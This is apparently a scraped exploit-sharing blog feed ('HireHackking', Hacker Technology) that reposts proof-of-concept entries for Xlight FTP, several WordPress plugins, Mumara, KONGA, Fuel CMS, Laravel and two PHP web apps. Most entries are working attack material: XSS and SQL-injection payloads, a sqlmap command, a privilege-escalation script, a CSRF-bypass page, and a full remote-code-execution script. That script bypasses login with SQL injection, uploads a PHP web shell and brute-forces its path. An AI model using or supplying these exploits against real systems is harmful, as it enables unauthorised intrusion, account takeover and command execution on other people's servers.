    # Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-12 # Vendor Homepage: https://www.xlightftpd.com/ # Software Link: https://www.xlightftpd.com/download/setup.exe # Tested Version: 3.9.3.1 # Vulnerability Type: Buffer Overflow Local # Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC) # Steps to reproduce: # 1. - Download and Xlight FTP # 2. - Run the python script and it will create exploit.txt file. # 3. - Open Xlight FTP 3.9.3.1 # 4. - "File and Directory - Access Control List - Setup - Added users list directories # 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied # 6. - Go to Setup -> added -> Enter new Item - Paste the characters # 7 - Crashed #!/usr/bin/python exploit = 'A' * 550 try: file = open("exploit.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")
  18. HireHackking

    WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS) # Date: 20/08/2021 # Exploit Author: Davide Taraschi # Vendor Homepage: https://wpschoolpress.com/ # Software Link: https://wpschoolpress.com/free-download/ # Version: up to 2.1.17 (non included) # Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2 # CVE : CVE-2021-24664 # Description: The plugin sanitise some fields using a wordpress built-in function called sanitize_text_field() but does not correctly escape them before outputting in attributes, resulting in Stored Cross-Site Scripting issues. The function wp_sanitize_text_field() escape < and > but does not escape characters like ", allowing an attacker to break a HTML input tag and inject arbitrary javascript. # PoC: As admin, - Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), Tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)// The XSS will be triggered when adding another teacher attendance by clicking on the Add button - Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)// The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button - Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3) - Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the Subject - Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the Exam=20 Note that some of this XSS issues can be executed by a teacher (medium-privileged user), but since wordpress uses HTTPonly cookies is impossible to steal cookies.
  19. HireHackking

    Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated) # Date: 2021-11-11 # Exploit Author: (v0yager) Shain Lakin # Vendor Homepage: https://mumara.com # Version: <= 2.93 # Tested on: CentOS 7 -==== Vulnerability ====- An SQL injection vulnerability in license_update.php in Mumara Classic through 2.93 allows a remote unauthenticated attacker to execute arbitrary SQL commands via the license parameter. -==== POC ====- Using SQLMap: sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql
  20. HireHackking

    KONGA 0.14.9 - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KONGA 0.14.9 - Privilege Escalation # Date: 10/11/2021 # Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec) # Vendor Homepage: https://github.com/pantsel/konga # Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip # Version: 0.14.9 # Tested on: Linux - Ubuntu 20.04.3 LTS (focal) import requests import json urlkonga = "http://www.example.com:1337/" # change to your konga address identifier = "usernormalkonga" # change user password = "changeme" # change password headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Content-Type": "application/json;charset=utf-8", "connection-id": "", "Origin": urlkonga, "Referer": urlkonga } url = urlkonga+"login" data = { "identifier":identifier, "password":password } response = requests.post(url, json=data) json_object = json.loads(response.text) print("[+] Attack") print("[+] Token " + json_object["token"]) url2 = urlkonga+"api/user/"+str(json_object["user"]["id"]) id = json_object["user"]["id"] print("[+] Exploiting User ID "+str(json_object["user"]["id"])) data2 = { "admin": "true", "passports": { "password": password, "protocol": "local" }, "password_confirmation": password, "token":json_object["token"] } print("[+] Change Normal User to Admin") response2 = requests.put(url2, headers=headers, json=data2) print("[+] Success")
  21. HireHackking

    Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) # Date: 2021-04-11 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip # Version: 1.4.13 # Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46 Steps to Reproduce: 1. At first login your panel 2. then go to "Activity Log" menu 3. then select any type option 4. their "col" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in "col=" parameter. POC: http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date and (select * from(select(sleep(1)))a)&fuel_inline=0 Output: By issuing sleep(0) response will be delayed to 0 seconds. By issuing sleep(1) response will be delayed to 1 seconds. By issuing sleep(5) response will be delayed to 5 seconds. By issuing sleep(10) response will be delayed to 10 seconds
  22. HireHackking

    Simple Subscription Website 1.0 - SQLi Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass # Exploit Author: Daniel Haro (Dirox) # Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html # Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html # Version: Simple Subscription Website 1.0 # Tested on: Windows, xampp # CVE: CVE-2021-43140 - Description: SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- - PoC: POST /plan_application/Actions.php?a=login HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 57 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/plan_application/admin/login.php Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3 username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-
  23. HireHackking

    WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated) # Date: 11/11/2021 # Exploit Author: Mohammed Aadhil Ashfaq # Vendor Homepage: https://form2email.dwbooster.com/ # Version: 1.3.24 # Tested on: wordpress POC 1. Click Contact form to Email http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail 2. Create new form name with <script>alert(1)</script> 3. Click Publish 4. XSS has been triggered http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687 5. Open a different browser, logged in with wordpress. Copy the URL and Press enter. XSS will trigger.
  24. HireHackking

    Online Learning System 2.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE) # Date: 15/11/2021 # Exploit Author: djebbaranon # Vendor Homepage: https://github.com/oretnom23 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip # Version: 2.0 # Tested on: Kali linux / Windows 10 # CVE : CVE-2021-42580 #!/usr/bin/python3 import os import time import argparse import requests import sys from colorama import init from colorama import Fore from colorama import Back from colorama import Style init(autoreset=True) def banner(): print(''' _____ _ _ _ _ _____ ______ _____ _____ | _ | | (_) | | (_) / __ \ | ___ / __ | ___| | | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__ | | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __| \ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___ \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/ __/ | |___/ Written by djebbaranon twitter : @dj3bb4ran0n1 zone-h : http://zone-h.org/archive/notifier=djebbaranon ''') banner() def my_args(): parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami") parser.add_argument("-u","--url",type=str,required=True,help="url of target") parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name") parser.add_argument("-c","--command",type=str,required=True,help="command to execute") my_arguments = parser.parse_args() return my_arguments def login_with_sqli_login_bypass(user,passw): global session global url global cookies url = my_args().url session = requests.Session() data = { "username" : user, "password" : passw, } try: response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False) print( Fore.GREEN + "[+] Logged in succsusfully") cookies = response.cookies.get_dict() print("[+] your cookie : ") except requests.HTTPError as exception: print(Fore.RED + "[-] HTTP Error : {}".format(exception)) sys.exit(1) login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -") def main(shell_name,renamed_shell): try: payload ={ "id" : "", "faculty_id" : "test", "firstname" : "test", "lastname" : "test", "middlename" : "fsdfsd", "dob" : "2021-10-29", "gender": "Male", "department_id" : "1", "email" : "zebi@gmail.com", "contact" : "zebii", "address" : "zebii", } files = { "img" : ( shell_name, "<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>", "application/octet-stream", ) } vunlerable_file = "/classes/Master.php?f=save_faculty" print("[*] Trying to upload webshell ....") response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files) print("[+] trying to bruteforce the webshell ....") rangee = my_args().range for i in range(0,rangee): try: with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3: if "nikmok" in response3.text and response3.status_code == 200: print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n") break with open("shell.txt",mode="w+") as writer: writer.write(response3.url) else: print( Fore.RED + "[-] shell not found : " + response3.url) except requests.HTTPError as exception2: print("[-] HTTP Error : {0} ".format(exception2)) except requests.HTTPError as error: print("[-] HTTP Error : ".format(error)) command = my_args().command with requests.get(response3.url.replace("whoami",command)) as response4: print("[*] Executing {} ....".format(command)) time.sleep(3) print("\n" + Style.BRIGHT + Fore.GREEN + response4.text) main("hackerman.php","")
  25. HireHackking

    PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) # Date: 14/11/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://laravel.com/ # Software Link: https://laravel.com/docs/4.2 # Version: Laravel Framework 8.70.1 # Tested on: Windows/Linux # Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server # which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b # Steps to reproduce: 1- Use HxD tool and add FF D8 FF E0 at the very begining of your file 2- Use code below to bypass csrf token ÿØÿà<html> <head> <title>Laravel Csrf Bypass</title> </head> <body> <script> function submitFormWithTokenJS(token) { var xhr = new XMLHttpRequest(); xhr.open("POST", POST_URL, true); // Send the proper header information along with the request xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); // This is for debugging and can be removed xhr.onreadystatechange = function() { if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { console.log(xhr.responseText); } } // xhr.send("_token=" + token + "&desiredParameter=desiredValue"); } function getTokenJS() { var xhr = new XMLHttpRequest(); // This tels it to return it as a HTML document xhr.responseType = "document"; // true on the end of here makes the call asynchronous //Edit the path as you want xhr.open("GET", "/image-upload", true); xhr.onload = function (e) { if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { // Get the document from the response page = xhr.response // Get the input element input = page.getElementsByTagName("input")[0]; // Show the token alert("The token is: " + input.value); // Use the token to submit the form submitFormWithTokenJS(input.value); } }; // Make the request xhr.send(null); } getTokenJS(); var POST_URL="/" getTokenJS(); </script> </html> 3- Save it as Html file and upload it.